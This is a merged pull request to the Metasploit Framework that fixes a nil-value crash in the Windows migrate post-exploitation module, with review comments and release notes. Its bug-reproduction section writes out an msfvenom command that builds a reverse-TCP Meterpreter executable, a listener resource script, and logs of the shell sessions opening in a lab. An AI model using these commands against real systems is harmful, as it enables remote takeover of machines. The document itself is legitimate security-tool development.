### PR TITLE
Fix #13053 - post/windows/manage/migrate & PPID_NAME

### LINKED ISSUE #13053: post/windows/manage/migrate - NoMethodError undefined method `downcase' for nil:NilClass
- [post/windows/manage/migrate.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/migrate.rb)
- [lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb)

## Setup Info

```
g0tmi1k@kali-dev:~$ uname -a
Linux kali-dev 5.4.0-kali3-amd64 #1 SMP Debian 5.4.13-1kali1 (2020-01-20) x86_64 GNU/Linux
g0tmi1k@kali-dev:~$
g0tmi1k@kali-dev:~$ cat /etc/*release
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2020.1"
VERSION_ID="2020.1"
VERSION_CODENAME="kali-rolling"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https://forums.kali.org/"
BUG_REPORT_URL="https://bugs.kali.org/"
g0tmi1k@kali-dev:~$ 
g0tmi1k@kali-dev:~$ dpkg -l | grep "metasploit-framework\|ruby "
ii  metasploit-framework                 5.0.76-0kali1                   amd64        Framework for exploit development and vulnerability research
ii  rake                                 13.0.1-2                        all          ruby make-like utility
ii  ruby                                 1:2.5.2                         amd64        Interpreter of object-oriented scripting language Ruby (default version)
g0tmi1k@kali-dev:~$ 
```

## Handler

```
g0tmi1k@kali-dev:~$ sudo msfdb start
[i] Database already started
g0tmi1k@kali-dev:~$ 
g0tmi1k@kali-dev:~$ grep -v '#' /home/g0tmi1k/windows-meterpreter-staged-reverse-tcp-443-exe.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.103.137
set LPORT 443
set ExitOnSession false
set EnableStageEncoding true
set AutoRunScript 'post/windows/manage/migrate'
run -j
g0tmi1k@kali-dev:~$
g0tmi1k@kali-dev:~$ sudo msfconsole -q -r '/home/g0tmi1k/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
[*] Processing /home/g0tmi1k/windows-meterpreter-staged-reverse-tcp-443-exe.rc for ERB directives.
resource (/home/g0tmi1k/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> use exploit/multi/handler
resource (/home/g0tmi1k/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/home/g0tmi1k/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> set LHOST 192.168.103.137
LHOST => 192.168.103.137
resource (/home/g0tmi1k/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> set LPORT 443
LPORT => 443
resource (/home/g0tmi1k/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> set ExitOnSession false
ExitOnSession => false
resource (/home/g0tmi1k/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (/home/g0tmi1k/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> set AutoRunScript 'post/windows/manage/migrate'
AutoRunScript => post/windows/manage/migrate
resource (/home/g0tmi1k/windows-meterpreter-staged-reverse-tcp-443-exe.rc)> run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.103.137:443 
msf5 exploit(multi/handler) > 
msf5 exploit(multi/handler) > db_status
[*] Connected to msf. Connection type: postgresql.
msf5 exploit(multi/handler) > 
```

## Payload

```
g0tmi1k@kali-dev:~$ msfvenom -p windows/meterpreter/reverse_tcp -f exe \
>   --platform windows -a x86 -e generic/none LHOST=192.168.103.137 LPORT=443 \
>   > '/home/g0tmi1k/windows-meterpreter-staged-reverse-tcp-443.exe'
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 341 (iteration=0)
generic/none chosen with final size 341
Payload size: 341 bytes
Final size of exe file: 73802 bytes
g0tmi1k@kali-dev:~$ 
```

## The Issue

```
msf5 exploit(multi/handler) > [*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (180320 bytes) to 192.168.103.130
[*] Meterpreter session 1 opened (192.168.103.137:443 -> 192.168.103.130:1350) at 2020-03-10 12:13:50 +0000
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (180320 bytes) to 192.168.103.130
[*] Meterpreter session 2 opened (192.168.103.137:443 -> 192.168.103.130:1349) at 2020-03-10 12:13:51 +0000
[*] Session ID 1 (192.168.103.137:443 -> 192.168.103.130:1350) processing AutoRunScript 'post/windows/manage/migrate'
[*] Running module against OFFSECWIN
[*] Current server process: windows-meterpreter-staged-reverse-tcp-443.exe (552)
[-] Post failed: NoMethodError undefined method `downcase' for nil:NilClass
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:46:in `block in []'
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:219:in `each'
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:219:in `each_process'
[-]   /usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb:45:in `[]'
[-]   /usr/share/metasploit-framework/modules/post/windows/manage/migrate.rb:81:in `create_temp_proc'
[-]   /usr/share/metasploit-framework/modules/post/windows/manage/migrate.rb:47:in `run'

```

### PR DESCRIPTION
**Pull request by g0tmi1k**
If its blank, no point in going forward!

More info ~ https://github.com/rapid7/metasploit-framework/issues/13053

### CODE REVIEW

**Comment by ccondon-r7** [comment]
Whoa, a wild @g0tmi1k appears!

**Comment by wvu-r7** [comment]
YOU AGAIN.

File: lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb [hunk 1]
```diff
@@ -42,6 +42,8 @@ class << self
   # valid.
   #
   def Process.[](key)
+    return nil if key == nil
```
Comment (wvu-r7) [inline lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb]: `return if key.nil?` or `return unless key` are preferred styles. :)

Comment (g0tmi1k) [reply lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb]: Noted ~ https://github.com/rapid7/metasploit-framework/pull/13054/commits/204e4d8cdb434b4ad13bad0d212d834aef53bf8f

**Comment by g0tmi1k** [comment]
Thanks for the warm welcome @wvu-r7 (as always ;) - updated PR with your suggestion.

And hello @ccatalan-r7 !

**Comment by wvu-r7** [comment]
# Release Notes

This fixes an undefined method crash when running the `post/windows/manage/migrate` module.

**Comment by g0tmi1k** [comment]
Thank you @wvu-r7 as always! 
<3

**Pull request merged**